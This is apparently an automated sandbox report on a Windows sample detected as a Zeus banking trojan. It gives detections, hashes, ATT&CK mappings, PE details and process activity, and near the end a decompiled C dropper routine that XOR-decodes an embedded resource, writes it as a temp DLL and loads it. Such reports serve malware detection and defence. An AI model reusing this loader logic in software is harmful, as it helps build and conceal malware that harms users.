Contains VNC / remote desktop functionality (version string found)

Show sources

Source: yw6At7QnNh.exe, 00000002.00000002.205524903.0000000002070000.00000004.00000001.sdmp	String found in binary or memory: RFB 003.003
Source: yw6At7QnNh.exe, 00000002.00000002.205524903.0000000002070000.00000004.00000001.sdmp	String found in binary or memory: identityAccept-EncodingTEIf-Modified-SinceRFB 003.003
Source: yw6At7QnNh.exe	String found in binary or memory: RFB 003.003
Source: yw6At7QnNh.exe	String found in binary or memory: RFB 003.003
Source: yw6At7QnNh.exe, 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp	String found in binary or memory: identityAccept-EncodingTEIf-Modified-SinceRFB 003.003

Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040F5E2 socket,bind,closesocket,		3_2_0040F5E2
Source: C:\Users\user\Desktop\yw6At7QnNh.exe	Code function: 3_2_0040F304 socket,bind,listen,closesocket,		3_2_0040F304

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture11	System Time Discovery2	Remote Desktop Protocol1	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	System Shutdown/Reboot1
Default Accounts	Scheduled Task/Job	Create Account1	Valid Accounts1	Obfuscated Files or Information2	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Input Capture11	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Valid Accounts1	Access Token Manipulation11	Install Root Certificate1	Security Account Manager	File and Directory Discovery1	SMB/Windows Admin Shares	Clipboard Data1	Automated Exfiltration	Remote Access Software1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Process Injection211	Software Packing22	NTDS	System Information Discovery4	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Network Share Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Security Software Discovery311	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Virtualization/Sandbox Evasion1	DCSync	Virtualization/Sandbox Evasion1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Access Token Manipulation11	Proc Filesystem	Process Discovery1	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection211	/etc/passwd and /etc/shadow	System Owner/User Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
yw6At7QnNh.exe	81%	Virustotal		Browse
yw6At7QnNh.exe	61%	Metadefender		Browse
yw6At7QnNh.exe	92%	ReversingLabs	Win32.Trojan.Zeus
yw6At7QnNh.exe	100%	Avira	TR/Dropper.Gen
yw6At7QnNh.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp	100%	Avira	TR/Agent.hjvc
C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp	5%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp	53%	ReversingLabs	Win32.Trojan.Zeus

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.2.yw6At7QnNh.exe.400000.0.unpack	100%	Avira	HEUR/AGEN.1115251	Download File
1.2.yw6At7QnNh.exe.10000000.4.unpack	100%	Avira	TR/Agent.hjvc	Download File
3.2.yw6At7QnNh.exe.400000.0.unpack	100%	Avira	TR/Kazy.MK	Download File
3.1.yw6At7QnNh.exe.400000.0.unpack	100%	Avira	TR/Kazy.MK	Download File
1.2.yw6At7QnNh.exe.400000.0.unpack	100%	Avira	TR/Agent.hjvc	Download File

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.google.com/webhp	yw6At7QnNh.exe	false		high
http://www.google.com/webhpbcMY.txt	yw6At7QnNh.exe, 00000002.00000002.205524903.0000000002070000.00000004.00000001.sdmp, yw6At7QnNh.exe, 00000003.00000001.203739017.0000000000400000.00000040.00020000.sdmp	false		high

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	458121
Start date:	02.08.2021
Start time:	21:04:10
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 3m 52s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	yw6At7QnNh (renamed file extension from none to exe)
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	4
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.evad.winEXE@5/2@0/0
EGA Information:	Failed
HDC Information:	Successful, ratio: 78.7% (good quality ratio 73.1%) Quality average: 81.9% Quality standard deviation: 29.7%
HCA Information:	Successful, ratio: 72% Number of executed functions: 25 Number of non-executed functions: 150
Cookbook Comments:	Adjust boot time Enable AMSI Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\ athefff3h6266cd5fa708f.tmp Download File
Process:	C:\Users\user\Desktop\yw6At7QnNh.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	2.4857544881426725
Encrypted:	false
SSDEEP:	12:etGSGsXpFmGEqIUfIjjObu0Nql2nLEu98DwhKQstDISMhTF0L/x8O6r:etGSB54qIUwnO/AHDw0jukx
MD5:	79460E0544E0DFFE86DD51BBA404A2D3
SHA1:	ED294E22259F0DE6BAC6DD7A701B19B3CDCDA900
SHA-256:	2AFD890122BBA0EED6193476D04266B4A5B7A4DE53CB514BD9EAF4243D9FC973
SHA-512:	E2511BCC767B9EA93D378AA5D3D81A08D39701E9920019C9125BED88CDE1DE02BFABD8A5242710E86B4D20A75A65607DE442772753AB47230DEA4A9BA36F563A
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Virustotal, Detection: 5%, Browse Antivirus: ReversingLabs, Detection: 53%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........N.. ... ... ...!... ...3... .I.+... .I.$... .Rich.. .........PE..L....t{N...........!......................... ...............................P....................................... ..L.... ..(............................@....................................................... ...............................text............................... ..`.rdata....... ......................@..@.data........0......................@....reloc..(....@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\414045e2d09286d5db2581e0d955d358_d06ed635-68f6-4e9a-955c-4899f5f57b9a Download File
Process:	C:\Users\user\Desktop\yw6At7QnNh.exe
File Type:	data
Category:	dropped
Size (bytes):	46
Entropy (8bit):	1.0424600748477153
Encrypted:	false
SSDEEP:	3:/lbON:u
MD5:	89CA7E02D8B79ED50986F098D5686EC9
SHA1:	A602E0D4398F00C827BFCF711066E67718CA1377
SHA-256:	30AC626CBD4A97DB480A0379F6D2540195F594C967B7087A26566E352F24C794
SHA-512:	C5F453E32C0297E51BE43F84A7E63302E7D1E471FADF8BB789C22A4D6E03712D26E2B039D6FBDBD9EBD35C4E93EC27F03684A7BBB67C4FADCCE9F6279417B5DE
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	........................................user.

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.5870490062472085
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yw6At7QnNh.exe
File size:	225792
MD5:	8ba293749c97cbf48f30f02c66d3406d
SHA1:	6a7492a26d0a16320daa2cb187232fc0053f4f5f
SHA256:	e2075b32b9716dc41ef667a74c1ae2c2841a5b9fd3046db0bdcd96c581778253
SHA512:	041e3f65fcb877eb19f5d63cb79d2eb6327ee4b06191a3a4202a736fb6215cd2b2b5c436c081b0165acf2b1b0341c8c551bbf166f8f46ce48fedd7d23ff74049
SSDEEP:	6144:ERAL6uxQIBpPnki+81Rnn1BgUUhgmfwgA3Bfdw+:z4MT+81RnnHLUhgrL3tdw+
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Hs..Hs..Hs..Hs..Ks...o..Gs...l...s..*l..Os..Hs...s...l..[s...u..Is..RichHs..................PE..L...G.{N...................

File Icon


Icon Hash:	0000000000000000

Static PE Info

General
Entrypoint:	0x401c01
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x4E7B9D47 [Thu Sep 22 20:40:39 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	0f16db1e18559cc080852e2e8fd0038e

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
push FFFFFFFFh
push 0040C160h
push 00402C1Ch
mov eax, dword ptr fs:[00000000h]
push eax
mov dword ptr fs:[00000000h], esp
sub esp, 58h
push ebx
push esi
push edi
mov dword ptr [ebp-18h], esp
call dword ptr [0040C0B0h]
xor edx, edx
mov dl, ah
mov dword ptr [0040EFBCh], edx
mov ecx, eax
and ecx, 000000FFh
mov dword ptr [0040EFB8h], ecx
shl ecx, 08h
add ecx, edx
mov dword ptr [0040EFB4h], ecx
shr eax, 10h
mov dword ptr [0040EFB0h], eax
xor esi, esi
push esi
call 00007FF708C3611Ah
pop ecx
test eax, eax
jne 00007FF708C3529Ah
push 0000001Ch
call 00007FF708C35345h
pop ecx
mov dword ptr [ebp-04h], esi
call 00007FF708C35F5Ah
call dword ptr [0040C0ACh]
mov dword ptr [00410A58h], eax
call 00007FF708C35E18h
mov dword ptr [0040EF98h], eax
call 00007FF708C35BC1h
call 00007FF708C35B03h
call 00007FF708C3545Ch
mov dword ptr [ebp-30h], esi
lea eax, dword ptr [ebp-5Ch]
push eax
call dword ptr [0040C0A8h]
call 00007FF708C35A94h
mov dword ptr [ebp-64h], eax
test byte ptr [ebp-30h], 00000001h
je 00007FF708C35298h
movzx eax, word ptr [ebp-2Ch]
jmp 00007FF708C35295h
push 0000000Ah
pop eax
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword ptr [0040C0A4h]

Rich Headers

Programming Language:

[ C ] VS98 (6.0) build 8168
[RES] VS98 (6.0) cvtres build 1720
[C++] VS98 (6.0) build 8168

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd598	0x64	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x11000	0x29828	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xc000	0x15c	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xa21e	0xa400	False	0.593225990854	data	6.56845565551	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata	0xc000	0x1d40	0x1e00	False	0.365364583333	data	4.48192698758	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xe000	0x2a6c	0x1000	False	0.281005859375	data	3.38536461745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x11000	0x29828	0x29a00	False	0.905352618243	data	7.80378630892	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x11130	0x25a8	dBase III DBT, version number 0, next free block index 40	English	United States
RT_GROUP_ICON	0x136d8	0x14	data	English	United States
RT_VERSION	0x136ec	0x348	data	English	United States
None	0x13a34	0x26df4	data

Imports

DLL	Import
KERNEL32.dll	GetCurrentThreadId, lstrlenA, CloseHandle, FormatMessageA, lstrcatA, GetUserDefaultLangID, lstrcmpiA, SetFileAttributesA, TerminateProcess, GetCurrentProcess, GetLastError, GetProcAddress, LoadLibraryA, Sleep, GetTickCount, SetStdHandle, ReadFile, IsBadCodePtr, IsBadReadPtr, SetUnhandledExceptionFilter, FlushFileBuffers, SetFilePointer, RaiseException, SetEnvironmentVariableA, CompareStringW, CompareStringA, GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, MultiByteToWideChar, GetOEMCP, GetACP, GetCPInfo, IsBadWritePtr, VirtualAlloc, WriteFile, RtlUnwind, GetTimeZoneInformation, GetSystemTime, GetLocalTime, GetModuleHandleA, GetStartupInfoA, GetCommandLineA, GetVersion, ExitProcess, HeapReAlloc, HeapAlloc, HeapSize, HeapFree, UnhandledExceptionFilter, GetModuleFileNameA, FreeEnvironmentStringsA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStrings, GetEnvironmentStringsW, SetHandleCount, GetStdHandle, GetFileType, HeapDestroy, HeapCreate, VirtualFree
USER32.dll	DispatchMessageA, GetSysColor, GetDoubleClickTime, SetDoubleClickTime, GetDesktopWindow, PeekMessageA, IsWindow, IsDialogMessageA, PostMessageA, TranslateMessage, IsDlgButtonChecked, FindWindowA, SetWindowTextA, IsClipboardFormatAvailable, wsprintfA, MessageBoxA, GetClassInfoW, IsWindowEnabled
comdlg32.dll	GetOpenFileNameA
SHLWAPI.dll	PathAddBackslashA

Version Infos

Description	Data
LegalCopyright	Copyright 2011
InternalName	TStub
FileVersion	1, 0, 5, 1
CompanyName	dpjadagef
PrivateBuild
LegalTrademarks
Comments
ProductName	dpjadagef fddflsnjcjek
SpecialBuild
ProductVersion	1, 0, 5, 1
FileDescription	fddflsnjcjek
OriginalFilename	TStub.exe
Translation	0x0409 0x04b0

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

No network behavior found

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

Behavior

Click to jump to process

System Behavior

Analysis Process: yw6At7QnNh.exe PID: 3420 Parent PID: 5572

General

Start time:	21:04:57
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\yw6At7QnNh.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\yw6At7QnNh.exe'
Imagebase:	0x400000
File size:	225792 bytes
MD5 hash:	8BA293749C97CBF48F30F02C66D3406D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: yw6At7QnNh.exe PID: 5952 Parent PID: 3420

General

Start time:	21:04:57
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\yw6At7QnNh.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\yw6At7QnNh.exe'
Imagebase:	0x400000
File size:	225792 bytes
MD5 hash:	8BA293749C97CBF48F30F02C66D3406D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: yw6At7QnNh.exe PID: 1536 Parent PID: 5952

General

Start time:	21:04:58
Start date:	02/08/2021
Path:	C:\Users\user\Desktop\yw6At7QnNh.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\Desktop\yw6At7QnNh.exe'
Imagebase:	0x400000
File size:	225792 bytes
MD5 hash:	8BA293749C97CBF48F30F02C66D3406D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: yw6At7QnNh.exe PID: 3420 Parent PID: 5572 yw6At7QnNh.exeCOMMON

Executed Functions

Function 0040105A, Relevance: 101.9, APIs: 48, Strings: 10, Instructions: 404
windowlibrarystringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040105A() {
				int _v8;
				long _v12;
				void* _v16;
				char _v17;
				void* _v24;
				long _v28;
				char _v32;
				int _v36;
				long _v40;
				int _v44;
				char _v48;
				int _v52;
				int _v56;
				intOrPtr* _v60;
				char _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				char _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				int _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				int _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				long _v128;
				char _v132;
				struct tagMSG _v160;
				intOrPtr _v196;
				int _v204;
				int _v208;
				int _v212;
				long _v216;
				CHAR* _v220;
				intOrPtr _v224;
				CHAR* _v236;
				int _v244;
				struct tagOFNA _v248;
				struct _WNDCLASSW _v288;
				void _v587;
				char _v588;
				void _v847;
				char _v848;
				char _v1108;
				void _v1627;
				char _v1628;
				void* __edi;
				struct HWND__* _t155;
				struct HWND__* _t158;
				int _t166;
				signed int _t175;
				signed int _t176;
				long _t178;
				long _t180;
				int _t187;
				int _t189;
				void* _t190;
				void* _t202;
				intOrPtr* _t206;
				signed int _t209;
				long _t212;
				int _t215;
				struct HINSTANCE__* _t217;
				signed int _t238;
				struct HWND__* _t244;
				signed int _t247;
				signed int _t250;
				signed int _t256;
				signed int _t261;
				intOrPtr* _t263;
				intOrPtr* _t286;
				void* _t287;
				void* _t288;
				signed int _t289;
				char _t293;
				signed int _t295;
				CHAR* _t297;
				long _t298;
				intOrPtr* _t299;
				long _t301;
				intOrPtr _t302;
				CHAR* _t303;

				_t250 = 0x40;
				_v848 = 0;
				_v1628 = 0;
				memset( &_v847, 0, _t250 << 2);
				asm("stosw");
				asm("stosb");
				_push(0x4a);
				memset( &_v1627, 0, 0x81 << 2);
				asm("stosw");
				asm("stosb");
				_v588 = 0;
				memset( &_v587, 0, 0 << 2);
				asm("stosw");
				asm("stosb");
				if(_v28 == 0) {
					_v28 = GetSysColor(0x3e8);
				}
				_t295 = GetDoubleClickTime();
				SetDoubleClickTime(_t295 + _t295);
				_v28 = GetTickCount() * _t295 << 2;
				_t155 = GetDesktopWindow();
				_push(1);
				_push(0);
				_push(0);
				_v8 = _t155;
				_push(_t155);
				_v16 = 0;
				_push( &_v160);
				while(PeekMessageA() != 0 && _v16 < 0xc350) {
					if(_v32 != 0xffffffff) {
						_t238 = IsWindow(_v8);
						__eflags = _t238;
						if(_t238 == 0) {
							L9:
							TranslateMessage( &_v160);
							DispatchMessageA( &_v160);
							L10:
							IsDlgButtonChecked(_v8, 7);
							_t244 = GetDesktopWindow();
							_v16 = _v16 + 1;
							_push(1);
							_push(0);
							_push(0);
							_v8 = _t244;
							_push(_t244);
							_push( &_v160);
							continue;
						}
						_t247 = IsDialogMessageA(_v8,  &_v160);
						__eflags = _t247;
						if(_t247 != 0) {
							goto L10;
						}
						goto L9;
					}
					Sleep(0x64);
					goto L10;
				}
				_t158 = FindWindowA(0, "4rwsl5feha6g446p"); // executed
				_v8 = _t158;
				SetWindowTextA(0,  &_v848);
				_t297 = "GetTempPathA";
				_t286 = 0x40ef50;
				do {
					 *_t286 = GetProcAddress(LoadLibraryA("Kernel32.dll"), _t297);
					_t286 = _t286 + 4;
					_t297 =  &(_t297[0x15]);
					__eflags = _t286 - 0x40ef6c;
				} while (_t286 < 0x40ef6c);
				__eflags = 0;
				_t256 = 0x41;
				_t287 =  &_v848;
				memset(_t287, 0, _t256 << 2);
				_t288 = _t287 + _t256;
				_v16 = FindResourceA(0, 0x16e, 0x11c);
				_t166 = IsClipboardFormatAvailable(2);
				_v28 = _t166;
				wsprintfA( &_v1628, "%d", _t166);
				_v24 = LoadResource(0, _v16);
				_v48 = _v17;
				_v44 = 0;
				_v40 = 0;
				_v36 = 0;
				_v64 = _v17;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_t298 = 0xa;
				do {
					_v12 = _t298;
					E0040162E( &_v48,  &_v12);
					_t298 = _t298 + 0xa;
					__eflags = _t298 - 0x186a0;
				} while (_t298 < 0x186a0);
				__eflags = _v44;
				_v12 = 0;
				if(_v44 != 0) {
					_t175 = _v40 - _v44;
					__eflags = _t175;
					_t176 = _t175 >> 2;
				} else {
					_t176 = 0;
				}
				E004015CF( &_v64, _t288, _t176,  &_v12);
				_t178 = _v40;
				_t289 = _v44;
				_t299 = _v60;
				__eflags = _t289 - _t178;
				_v12 = _t178;
				if(_t289 == _t178) {
					L20:
					_v12 = SizeofResource(0, _v16);
					_t180 = GetLastError();
					__eflags = _t180 - 0xc4;
					if(_t180 == 0xc4) {
						TerminateProcess(GetCurrentProcess(), _v28);
					}
					_v16 = LockResource(_v24);
					_v244 = _v8;
					_v220 =  &_v1108;
					_t261 = 0x16;
					_v248 = 0x58;
					_v216 = 0x104;
					_v236 = "All";
					_v224 = 1;
					_v212 = 0;
					_v1108 = 0;
					memset( &_v248, 0, _t261 << 2);
					_v208 = 0;
					_v204 = 0;
					_v196 = 0x1800;
					_t187 = GetOpenFileNameA( &_v248);
					__eflags = _t187 - 1;
					if(_t187 == 1) {
						SetFileAttributesA( &_v1108, 0x80);
					}
					_v8 = 0;
					_t189 = lstrcmpiA( &_v588, "GetTempPathA"); // executed
					__eflags = _t189;
					if(_t189 == 0) {
						__eflags = M0040E0A5; // 0x6d
						if(__eflags == 0) {
							MessageBoxA(0, "ecr6f1hda7ehw23grp51", 0, 0);
						}
					}
					_t190 = 0;
					__eflags = _v12;
					if(_v12 <= 0) {
						L31:
						GetClassInfoW(0, L"BUTTON",  &_v288);
						GetSysColor(_v288.hbrBackground);
						GetTempPathA(0x104,  &_v588);
						GetUserDefaultLangID();
						PathAddBackslashA( &_v588); // executed
						lstrcatA( &_v588, " athefff3h6266cd5fa708f.tmp");
						_push(0);
						_push(0x80);
						_t301 = 2;
						_t202 = CreateFileA( &_v588, 0xc0000000, 0, 0, _t301, ??, ??); // executed
						_v128 = _t301;
						_t293 = 1;
						_v12 = _t202;
						_t302 = 4;
						_v132 = _t293;
						_push(0);
						_v124 = 3;
						_v120 = _t302;
						_v116 = 5;
						_v112 = 6;
						_v108 = 7;
						_v104 = 8;
						_v100 = 9;
						_v96 = 0xa;
						_v92 = 0xb;
						_v88 = 0xc;
						_v84 = 0xd;
						_v80 = 0xe;
						_v76 = 0xf;
						_v72 = 0x10;
						_v68 = 0x11;
						E004018BC( &_v132,  &_v64);
						_t206 =  &_v64;
						_t263 =  &_v132;
						do {
							_t206 = _t206 - _t302;
							_v24 =  *_t263;
							 *_t263 =  *_t206;
							_t263 = _t263 + _t302;
							 *_t206 = _v24;
							__eflags = _t263 - _t206;
						} while (_t263 < _t206);
						do {
							_v132 = 0;
							_t209 = E00401841( &_v132,  &_v84);
							__eflags = _t209;
						} while (_t209 != 0);
						WriteFile(_v12, _v16, 0xc00,  &_v28, 0); // executed
						_t212 = GetLastError();
						 *0x40ef70 = _t212; // executed
						FormatMessageA(0x1000, 0, _t212, 0,  &_v1628, 0x64, 0); // executed
						CloseHandle(_v12);
						_t215 = IsWindowEnabled(_v24);
						__eflags = _t215 - _t293;
						if(_t215 == _t293) {
							PostMessageA(_v24, 0xa, 0, 0);
						}
						_t217 = LoadLibraryA( &_v588); // executed
						_t303 = "peagtfosapeh";
						_v24 = lstrlenA(_t303);
						 *0x40ef74 = GetProcAddress(_t217, _t303);
						_v28 = GetCurrentThreadId();
						 *0x40ef74(_v16 + 0xc00, 0x28e32b02); // executed
						E00401B0C( &_v32); // executed
						 *0x40ef78 = E00401AF3( &_v32);
						E004015AF();
						E004015AF();
						__eflags = 0;
						return 0;
					} else {
						do {
							 *(_v16 + _t190) =  *(_v16 + _t190) ^ ("fr8w44u61klsf0aplg[0ggmaeov&m5j2ff")[_v8];
							__eflags = _v8 - 0x21;
							if(_v8 == 0x21) {
								_v8 = 0;
							}
							_t190 = _t190 + 1;
							_v8 =  &(_v8->i);
							__eflags = _t190 - _v12;
						} while (_t190 < _v12);
						goto L31;
					}
				} else {
					do {
						 *_t299 = E00401054( *_t289);
						_t289 = _t289 + 4;
						_t299 = _t299 + 4;
						__eflags = _t289 - _v12;
					} while (_t289 != _v12);
					goto L20;
				}
			}

0x0040106a
0x00401073
0x00401079
0x0040107f
0x00401081
0x00401083
0x00401091
0x00401093
0x00401095
0x00401097
0x004010a1
0x004010a7
0x004010ac
0x004010ae
0x004010af
0x004010bc
0x004010bc
0x004010c5
0x004010cb
0x004010e3
0x004010e6
0x004010ee
0x004010f0
0x004010f1
0x004010f2
0x004010f5
0x004010fc
0x004010ff
0x00401100
0x00401113
0x00401122
0x00401128
0x0040112a
0x00401140
0x00401147
0x00401154
0x0040115a
0x0040115f
0x00401165
0x00401167
0x0040116a
0x0040116c
0x0040116d
0x0040116e
0x00401171
0x00401178
0x00000000
0x00401178
0x00401136
0x0040113c
0x0040113e
0x00000000
0x00000000
0x00000000
0x0040113e
0x00401117
0x00000000
0x00401117
0x00401181
0x00401187
0x00401192
0x00401198
0x0040119d
0x004011a2
0x004011b5
0x004011b7
0x004011ba
0x004011bd
0x004011bd
0x004011c7
0x004011c9
0x004011ca
0x004011da
0x004011da
0x004011e5
0x004011e8
0x004011ee
0x004011fe
0x00401211
0x00401217
0x0040121f
0x00401222
0x00401225
0x00401228
0x0040122b
0x0040122e
0x00401231
0x00401234
0x00401235
0x0040123c
0x0040123f
0x00401244
0x00401247
0x00401247
0x0040124f
0x00401252
0x00401255
0x0040125e
0x0040125e
0x00401261
0x00401257
0x00401257
0x00401257
0x0040126c
0x00401271
0x00401274
0x00401277
0x0040127a
0x0040127c
0x0040127f
0x00401296
0x004012a0
0x004012a3
0x004012a9
0x004012ae
0x004012ba
0x004012ba
0x004012c9
0x004012cf
0x004012dd
0x004012e8
0x004012f1
0x004012fb
0x00401301
0x0040130b
0x00401315
0x0040131b
0x00401321
0x00401329
0x00401330
0x00401336
0x00401340
0x00401346
0x0040134e
0x00401358
0x00401358
0x0040136a
0x0040136d
0x00401373
0x00401375
0x00401377
0x0040137d
0x00401387
0x00401387
0x0040137d
0x0040138d
0x0040138f
0x00401392
0x004013b6
0x004013c3
0x004013cf
0x004013dd
0x004013e3
0x004013f0
0x00401402
0x00401408
0x00401409
0x00401412
0x0040141c
0x00401424
0x00401427
0x00401428
0x00401430
0x00401431
0x00401434
0x00401439
0x00401441
0x00401444
0x0040144b
0x00401452
0x00401459
0x00401460
0x00401467
0x0040146e
0x00401475
0x0040147c
0x00401483
0x0040148a
0x00401491
0x00401498
0x0040149f
0x004014a7
0x004014aa
0x004014ad
0x004014af
0x004014b1
0x004014b6
0x004014bb
0x004014bd
0x004014bf
